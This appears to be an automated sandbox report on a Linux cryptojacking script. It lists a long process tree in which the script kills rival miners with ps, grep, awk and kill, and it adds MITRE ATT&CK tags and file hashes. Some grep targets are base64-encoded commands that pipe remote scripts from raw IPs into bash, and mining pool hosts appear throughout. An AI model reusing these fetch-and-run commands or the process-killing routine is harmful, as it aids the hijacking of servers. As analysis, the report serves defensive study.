/bin/grepgrep /tmp/udevd2⤵PID:2336
-
/bin/grepgrep -v grep2⤵PID:2335
-
/bin/psps aux2⤵PID:2334
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2343
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2342
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵PID:2341
-
/bin/grepgrep -v grep2⤵PID:2340
-
/bin/psps aux2⤵PID:2339
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2348
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2347
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵PID:2346
-
/bin/grepgrep -v grep2⤵PID:2345
-
/bin/psps aux2⤵
- Process Discovery
PID:2344 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2353
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2352
-
/bin/grepgrep sustse2⤵PID:2351
-
/bin/grepgrep -v grep2⤵PID:2350
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2349 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2358
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2357
-
/bin/grepgrep sustse32⤵PID:2356
-
/bin/grepgrep -v grep2⤵PID:2355
-
/bin/psps aux2⤵PID:2354
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2364
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2363
-
/bin/grepgrep wget2⤵PID:2362
-
/bin/grepgrep mr.sh2⤵PID:2361
-
/bin/grepgrep -v grep2⤵PID:2360
-
/bin/psps aux2⤵PID:2359
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2370
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2369
-
/bin/grepgrep curl2⤵PID:2368
-
/bin/grepgrep mr.sh2⤵PID:2367
-
/bin/grepgrep -v grep2⤵PID:2366
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2365 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2376
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2375
-
/bin/grepgrep wget2⤵PID:2374
-
/bin/grepgrep 2mr.sh2⤵PID:2373
-
/bin/grepgrep -v grep2⤵PID:2372
-
/bin/psps aux2⤵PID:2371
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2382 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2381
-
/bin/grepgrep curl2⤵PID:2380
-
/bin/grepgrep 2mr.sh2⤵PID:2379
-
/bin/grepgrep -v grep2⤵PID:2378
-
/bin/psps aux2⤵
- Process Discovery
PID:2377 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2388
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2387
-
/bin/grepgrep wget2⤵PID:2386
-
/bin/grepgrep cr5.sh2⤵PID:2385
-
/bin/grepgrep -v grep2⤵PID:2384
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2383 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2394
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2393
-
/bin/grepgrep curl2⤵PID:2392
-
/bin/grepgrep cr5.sh2⤵PID:2391
-
/bin/grepgrep -v grep2⤵PID:2390
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2389 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2400
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2399
-
/bin/grepgrep wget2⤵PID:2398
-
/bin/grepgrep logo9.jpg2⤵PID:2397
-
/bin/grepgrep -v grep2⤵PID:2396
-
/bin/psps aux2⤵
- Process Discovery
PID:2395 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2406
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2405
-
/bin/grepgrep curl2⤵PID:2404
-
/bin/grepgrep logo9.jpg2⤵PID:2403
-
/bin/grepgrep -v grep2⤵PID:2402
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2401 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2411
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2410
-
/bin/grepgrep j2.conf2⤵PID:2409
-
/bin/grepgrep -v grep2⤵PID:2408
-
/bin/psps aux2⤵PID:2407
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2417
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2416
-
/bin/grepgrep wget2⤵PID:2415
-
/bin/grepgrep luk-cpu2⤵PID:2414
-
/bin/grepgrep -v grep2⤵PID:2413
-
/bin/psps aux2⤵
- Process Discovery
PID:2412 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2423
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2422
-
/bin/grepgrep curl2⤵PID:2421
-
/bin/grepgrep luk-cpu2⤵PID:2420
-
/bin/grepgrep -v grep2⤵PID:2419
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2418 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2429
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2428
-
/bin/grepgrep wget2⤵PID:2427
-
/bin/grepgrep ficov2⤵PID:2426
-
/bin/grepgrep -v grep2⤵PID:2425
-
/bin/psps aux2⤵PID:2424
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2435
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2434
-
/bin/grepgrep curl2⤵PID:2433
-
/bin/grepgrep ficov2⤵PID:2432
-
/bin/grepgrep -v grep2⤵PID:2431
-
/bin/psps aux2⤵PID:2430
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2441
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2440
-
/bin/grepgrep wget2⤵PID:2439
-
/bin/grepgrep he.sh2⤵PID:2438
-
/bin/grepgrep -v grep2⤵PID:2437
-
/bin/psps aux2⤵PID:2436
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2447
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2446
-
/bin/grepgrep curl2⤵PID:2445
-
/bin/grepgrep he.sh2⤵PID:2444
-
/bin/grepgrep -v grep2⤵PID:2443
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2442 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2453
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2452
-
/bin/grepgrep wget2⤵PID:2451
-
/bin/grepgrep miner.sh2⤵PID:2450
-
/bin/grepgrep -v grep2⤵PID:2449
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2448 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2459 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2458
-
/bin/grepgrep curl2⤵PID:2457
-
/bin/grepgrep miner.sh2⤵PID:2456
-
/bin/grepgrep -v grep2⤵PID:2455
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2454 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2465
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2464
-
/bin/grepgrep wget2⤵PID:2463
-
/bin/grepgrep nullcrew2⤵PID:2462
-
/bin/grepgrep -v grep2⤵PID:2461
-
/bin/psps aux2⤵
- Process Discovery
PID:2460 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2471 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2470
-
/bin/grepgrep curl2⤵PID:2469
-
/bin/grepgrep nullcrew2⤵PID:2468
-
/bin/grepgrep -v grep2⤵PID:2467
-
/bin/psps aux2⤵
- Process Discovery
PID:2466 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2476
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2475
-
/bin/grepgrep 107.174.47.1562⤵PID:2474
-
/bin/grepgrep -v grep2⤵PID:2473
-
/bin/psps aux2⤵
- Process Discovery
PID:2472 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2481
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2480
-
/bin/grepgrep 83.220.169.2472⤵PID:2479
-
/bin/grepgrep -v grep2⤵PID:2478
-
/bin/psps aux2⤵
- Process Discovery
PID:2477 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2486
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2485
-
/bin/grepgrep 51.38.203.1462⤵PID:2484
-
/bin/grepgrep -v grep2⤵PID:2483
-
/bin/psps aux2⤵
- Process Discovery
PID:2482 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2491
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2490
-
/bin/grepgrep 144.217.45.452⤵PID:2489
-
/bin/grepgrep -v grep2⤵PID:2488
-
/bin/psps aux2⤵
- Process Discovery
PID:2487 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2496
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2495
-
/bin/grepgrep 107.174.47.1812⤵PID:2494
-
/bin/grepgrep -v grep2⤵PID:2493
-
/bin/psps aux2⤵PID:2492
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2501
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2500
-
/bin/grepgrep 176.31.6.162⤵PID:2499
-
/bin/grepgrep -v grep2⤵PID:2498
-
/bin/psps aux2⤵PID:2497
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2506
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2505
-
/bin/grepgrep mine.moneropool.com2⤵PID:2504
-
/bin/grepgrep -v grep2⤵PID:2503
-
/bin/psps auxf2⤵PID:2502
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2511 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2510
-
/bin/grepgrep pool.t00ls.ru2⤵PID:2509
-
/bin/grepgrep -v grep2⤵PID:2508
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2507 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2516
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2515
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵PID:2514
-
/bin/grepgrep -v grep2⤵PID:2513
-
/bin/psps auxf2⤵PID:2512
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2521
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2520
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵PID:2519
-
/bin/grepgrep -v grep2⤵PID:2518
-
/bin/psps auxf2⤵
- Reads CPU attributes
PID:2517 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2526
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2525
-
/bin/grepPID:2524
-
/bin/grepgrep -v grep2⤵PID:2523
-
/bin/psps auxf2⤵PID:2522
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2531 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2530
-
/bin/grepgrep monerohash.com2⤵PID:2529
-
/bin/grepgrep -v grep2⤵PID:2528
-
/bin/psps auxf2⤵PID:2527
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2536 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2535
-
/bin/grepgrep /tmp/a7b104c2702⤵PID:2534
-
/bin/grepgrep -v grep2⤵PID:2533
-
/bin/psps auxf2⤵
- Reads runtime system information
PID:2532 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2541
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2540
-
/bin/grepgrep xmr.crypto-pool.fr:66662⤵PID:2539
-
/bin/grepgrep -v grep2⤵PID:2538
-
/bin/psps auxf2⤵PID:2537
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2546
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2545
-
/bin/grepgrep xmr.crypto-pool.fr:77772⤵PID:2544
-
/bin/grepgrep -v grep2⤵PID:2543
-
/bin/psps auxf2⤵PID:2542
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2551 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2550
-
/bin/grepgrep xmr.crypto-pool.fr:4432⤵PID:2549
-
/bin/grepgrep -v grep2⤵PID:2548
-
/bin/psps auxf2⤵
- Reads runtime system information
PID:2547 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2556
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2555
-
/bin/grepgrep stratum.f2pool.com:88882⤵PID:2554
-
/bin/grepgrep -v grep2⤵PID:2553
-
/bin/psps auxf2⤵PID:2552
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2561
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2560
-
/bin/grepgrep xmrpool.eu2⤵PID:2559
-
/bin/grepgrep -v grep2⤵PID:2558
-
/bin/psps auxf2⤵PID:2557
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2565
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Sudo and Sudo Caching (1)
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Impair Defenses (2)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (1)
- Indicator Removal (1)
  - Clear Linux or Mac System Logs (1)
Downloads
-
Filesize
5B
MD5
727479ef7cedf30c03459bec7d87b0f0
SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41
SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba